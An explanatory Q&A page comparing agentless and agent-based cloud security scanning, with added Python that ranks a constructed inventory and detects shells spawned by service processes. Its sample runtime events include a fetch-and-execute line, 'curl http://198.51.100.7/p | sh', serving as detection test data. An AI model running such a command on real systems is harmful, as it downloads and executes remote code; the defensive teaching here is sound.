What is the difference between agent-based and agentless cloud security scanning? [Basic]
Answer
Agent-based scanning installs software on each workload to collect deep host and runtime telemetry. Agentless scanning connects through cloud APIs, volume snapshots, and resource metadata to assess workloads without installing anything on them. Agentless is easier to deploy broadly and sees everything the control plane and the disk reveal; agent-based is deeper, because it observes live behavior (processes, connections, file changes) that a point-in-time snapshot cannot show.
Technical explanation
Agentless scanning gives broad coverage of cloud inventory, misconfigurations, image and package vulnerabilities, identities and permissions, and network exposure with little operational friction: it needs only read access to the cloud account and permission to snapshot volumes, so it also covers accounts and hosts nobody would have installed an agent on. Its limits follow from the method: findings are point-in-time, and anything that exists only in memory or on the wire (a spawned shell, an outbound connection, a fileless payload) is invisible to it.
Agent-based tools (host agents, eBPF or kernel sensors) observe process activity, network connections, file changes, and runtime attacks in real time, and can block or kill on the host. The cost is operational: agents must be packaged, rolled out, updated, and kept healthy on every host, they consume CPU and memory, and an attacker with root can stop or tamper with them, so agent health itself has to be monitored.
Most mature programs combine the two: agentless for broad posture and prioritization across every account, and agents or eBPF/runtime sensors on the high-risk workloads where process-level detection and response justify the overhead.
Hands-on example
Example: use agentless scanning to inventory every AWS account in two days and rank the assets that are both internet-exposed and running known-vulnerable packages. Then add runtime agents to the payment and identity workloads, where process-level detection and response are required.
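The two halves of that example in working code, written for this page as an added illustration (it is not code from the original page or from any vendor's product). The inventory, package names, advisory feed, instance IDs, and process events are all constructed and hypothetical; in a real program the inventory comes from the cloud provider's describe-style APIs and from package lists read off volume snapshots, and the events come from a host or eBPF sensor.

```python
"""Added example, not from the original page: agentless triage over a
constructed multi-account inventory, then the runtime signal that only a
host agent or eBPF sensor can deliver on the workloads that get one."""
from dataclasses import dataclass, field
import ipaddress
import os

# ---- Agentless side: what cloud APIs and disk snapshots give you ----------
# Everything here is constructed and hypothetical: package names, versions,
# instance IDs and the advisory feed are placeholders, not real data.

@dataclass
class Workload:
    account: str
    instance_id: str
    public_ip: bool
    sg_ingress: list            # (cidr, port) rules allowed into the instance
    packages: dict              # package -> installed version, read from the snapshot
    tags: dict = field(default_factory=dict)

# Constructed advisory feed: package -> first fixed version (hypothetical).
VULN_FEED = {"libexample": "2.4.0", "webframework": "5.1.2"}
CRITICAL_ROLES = {"payment", "identity"}   # workloads that get runtime agents

def version_tuple(v):
    return tuple(int(x) for x in v.split("."))

def vulnerable_packages(w):
    """Packages on the snapshot older than the fixed version in the feed."""
    return [p for p, v in w.packages.items()
            if p in VULN_FEED and version_tuple(v) < version_tuple(VULN_FEED[p])]

def internet_exposed(w):
    """Public IP plus at least one ingress rule open to the whole internet."""
    if not w.public_ip:
        return False
    return any(ipaddress.ip_network(cidr).prefixlen == 0 for cidr, _ in w.sg_ingress)

def prioritize(inventory):
    """Exposed and vulnerable first, then vulnerable, then exposed, then clean;
    ties broken in favour of critical roles and more findings."""
    def key(w):
        vulns, exposed = vulnerable_packages(w), internet_exposed(w)
        critical = w.tags.get("role") in CRITICAL_ROLES
        return (exposed and bool(vulns), bool(vulns), exposed, critical, len(vulns))
    return sorted(inventory, key=key, reverse=True)

def agent_rollout(inventory):
    """Where the page says agents belong: payment and identity workloads."""
    return [w.instance_id for w in inventory if w.tags.get("role") in CRITICAL_ROLES]

INVENTORY = [  # constructed sample data
    Workload("prod-payments", "i-pay-01", True, [("0.0.0.0/0", 443)],
             {"libexample": "2.3.1", "webframework": "5.1.2"}, {"role": "payment"}),
    Workload("prod-identity", "i-idp-01", False, [("10.0.0.0/8", 443)],
             {"libexample": "2.4.0"}, {"role": "identity"}),
    Workload("dev-sandbox", "i-dev-01", True, [("0.0.0.0/0", 22)],
             {"libexample": "2.1.0"}, {"role": "test"}),
    Workload("prod-batch", "i-batch-01", False, [("10.0.0.0/8", 8080)],
             {"webframework": "5.0.9"}, {"role": "batch"}),
]

# ---- Agent side: what only a runtime sensor sees --------------------------
# Constructed process-exec events in the shape a host/eBPF sensor emits. A
# disk snapshot of i-pay-01 taken before and after these events is identical,
# since nothing was installed, so agentless scanning has nothing to report.
RUNTIME_EVENTS = [
    {"host": "i-pay-01", "parent": "/usr/bin/java", "exe": "/usr/bin/java",
     "argv": ["java", "-jar", "app.jar"]},
    {"host": "i-pay-01", "parent": "/usr/bin/java", "exe": "/bin/sh",
     "argv": ["sh", "-c", "curl http://198.51.100.7/p | sh"]},  # documentation IP range
    {"host": "i-idp-01", "parent": "/usr/sbin/cron", "exe": "/bin/sh",
     "argv": ["sh", "/etc/cron.daily/logrotate"]},
]
SERVICE_PARENTS = {"java", "node", "nginx", "python3", "gunicorn"}
SHELLS = {"sh", "bash", "dash"}

def shell_from_service(events):
    """A shell spawned directly by a network-facing service process, the usual
    follow-on to a web shell or RCE. cron spawning sh is expected and ignored."""
    return [e for e in events
            if os.path.basename(e["parent"]) in SERVICE_PARENTS
            and os.path.basename(e["exe"]) in SHELLS]

if __name__ == "__main__":
    for w in prioritize(INVENTORY):
        print(w.account, w.instance_id, "exposed" if internet_exposed(w) else "internal",
              vulnerable_packages(w))
    print("agents to:", agent_rollout(INVENTORY))
    for e in shell_from_service(RUNTIME_EVENTS):
        print("runtime alert:", e["host"], " ".join(e["argv"]))
```

The ranking puts the exposed, vulnerable payment host first and the patched identity host last, yet the identity host still gets an agent because of its role, not its current findings. The runtime rule then catches something the snapshot never will: the java process on the payment host spawning a shell that pipes a download into another shell. That is the division of labour the answer above describes, posture from the snapshot, behaviour from the sensor.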